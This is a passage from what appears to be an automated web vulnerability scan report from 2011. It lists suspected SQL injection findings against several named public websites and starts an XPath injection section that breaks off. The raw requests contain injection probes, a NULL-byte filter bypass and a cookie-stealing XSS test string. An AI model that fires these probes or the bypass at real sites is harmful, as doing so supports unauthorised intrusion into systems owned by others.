User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:48 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:48 GMT
Content-Length: 29105
X-Blekko-PT: 26159a87074ec6fc43874b2d78f49cf0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
account. It is our policy
               to use Personally Identifiable Information to provide our technology and services, and not provide such to anyone outside of blekko without your consent (but see
               ...Exceptions to this Privacy Policy... below). </li>
...[SNIP]...
<li>to investigate, prevent or take action with regard to illegal activity, suspected fraud, potential threat to the physical safety of any individual, violations of the blekko
               Terms of Service, or as otherwise required by law;</li>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.12. http://blekko.com/ws/xss+/date [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/date

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/xss+/date?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:18 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79337
X-Blekko-QF: chq
X-Blekko-PT: 6063d8d8eeb38be977e761d70635bc78

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

GET /ws/xss+/date?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:19 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.13. http://blekko.com/ws/xss+/date [suggestedSlashtagsList cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/xss+/date

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ws/xss+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:15 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79330
X-Blekko-QF: chq
X-Blekko-PT: 44f5cb25739892961c979aced5c70ef6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:16 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.14. http://blekko.com/ws/xss+/site=ha.ckers.org [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blekko.com
Path:	/ws/xss+/site=ha.ckers.org

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/xss+'/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:06 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 73511
X-Blekko-QF: hq
X-Blekko-PT: 7773525d7e198d25f7140a30b928b6b6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet7">For those of you who are familiar with the RSA diminutive munitions project from ages ago, back when it was illegal to export certain crypto systems, and the diminutive PERL contests I've enacted a similar contest to write a diminutive self replicating <strong>
...[SNIP]...

Request 2

GET /ws/xss+''/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.15. http://googleads.g.doubleclick.net/pagead/ads [color_url parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The color_url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the color_url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500'&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500''&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.16. http://googleads.g.doubleclick.net/pagead/ads [saldr parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The saldr parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the saldr parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1'&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1''&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

1.17. http://news.google.com/news/story [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://news.google.com
Path:	/news/story

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/story HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q="

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=EYtHjiYP5kOB7gTcEAAy1Jtw9LIAHRdjqdU_4_7j9uSCko6Gh0azHUYusGbifXTXcYEqyKocrdBs80Bh6bDWIuEn2OfLiIDq4LoIRKO8fcCXiyHs_5xz2mVk7MM0B_ky;Domain=.google.com;Path=/;Expires=Wed, 03-Aug-2011 15:37:34 GMT;HttpOnly
Date: Tue, 01 Feb 2011 15:37:34 GMT
Expires: Tue, 01 Feb 2011 15:37:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
4J2H2Wkg4gnMQE_p195fMUAgpcYIJDx3t6nec_c3lUnCVmWZbc_9ZeNoniVbpA7w12s9pN6LyGsevEpyJYhJ6I5oVGvf9uODE4dFv4Sa56mF-bgTriJon7LM5OQPrJx-Ba3v1gkLXwM0lS1nMnwUXa_mPtsJLog92IUPKygEGcxUdj8_KZ6pSr36M6ZnpubYu4k0GbM_wORA-3s3PCXoiAukf4CILbvlAfvTcSoBZtxbTjMbbvbHKfXqbzI-_5gpc5CxOpFcoscw3IsBQvavUYkgZvE-UL059BwpBY0MNrIlUr4WHVPXpPkAHOzQRuShQ-BMYPRGLnRabtOxD-XDuZx_Y0ZyVD61nhZTHjpTTBxw95QaJ1yZDUKfVal2_dEB7PO59pYfTUWMtZUgVAGRviG
...[SNIP]...

1.18. http://offers.lendingtree.com/splitter/splitter.ashx [800Num parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://offers.lendingtree.com
Path:	/splitter/splitter.ashx

Issue detail

The 800Num parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 800Num parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3rvf2azbtvqvcurys2gfk355; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 30033
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...

if(promoID == null) return;

Tree.API.LendingTree.getPromoInfo(promoID, function(promoInfo) {

if (promoInfo == null || promoInfo.Status != "1") { // invalid promo resort to default

Tree.API.LendingTree.getPromoInfo(defaultPromoID, function(promoInfo) {

prepopPromoObject(promoInfo)

...[SNIP]...

Request 2

GET /splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2 HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 15:38:25 GMT
Location: http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731''&adtype=2
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Shaggy
X-Powered-By: ASP.NET
Content-Length: 290
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://offers.lendingtree.com/splitter/splitter.ashx?id=displaysfrefidirect&promo=00313&source=4666360&es
...[SNIP]...

1.19. http://www.google.com/finance [hl\x3den\x26tab\x3dwe\x22 parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.google.com
Path:	/finance

Issue detail

The hl\x3den\x26tab\x3dwe\x22 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hl\x3den\x26tab\x3dwe\x22 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /finance?hl\x3den\x26tab\x3dwe\x22' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 1

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Wed, 02 Feb 2011 15:53:47 GMT
Expires: Wed, 02 Feb 2011 15:53:47 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
<div class=snippet>By Ryan Vlastelica NEW YORK, Feb 2 (Reuters) - US stocks were little changed on Wednesday as a strong reading on the labor market failed to extend gains a day after the Dow and S&P reached their highest close in about 2-1/2 years.</div>
...[SNIP]...

Request 2

GET /finance?hl\x3den\x26tab\x3dwe\x22'' HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response 2

1.20. http://www.hotelclub.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.hotelclub.com
Path:	/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 13176
Content-Type: text/html; Charset=windows-1252
Expires: Wed, 02 Feb 2011 15:58:39 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:59:40 GMT
Connection: close
Set-Cookie: ltvisit=%7BA1C36645%2DB155%2D4858%2DA1E8%2D701A315C8806%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQCDQDRTT=GNEIPJKDPDKCKEAIKMCFGKKD; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273445525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 13176

<html>
<head>

<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>

<link rel="stylesheet" id="main-css" href="/Private/styles/styles.css" type="text/css">

...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 228109
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 15:59:36 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Date: Wed, 02 Feb 2011 15:59:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E1; path=/
Set-Cookie: AffiliateLogID=%2D2078738119; expires=Fri, 04-Mar-2011 13:00:00 GMT; path=/
Set-Cookie: ltvisit=%7BD4EBE398%2DB8FE%2D4B7D%2D9079%2D5C17098A1DC7%7D; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACTBCTST=NNLDPPJDCLHLLKGJCOELHMHF; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273a45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 228109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

2. XPath injection previous next
There are 2 instances of this issue:

/news/ [REST URL parameter 1]
/video/ [REST URL parameter 1]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

2.1. http://entertainment.msn.com/news/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

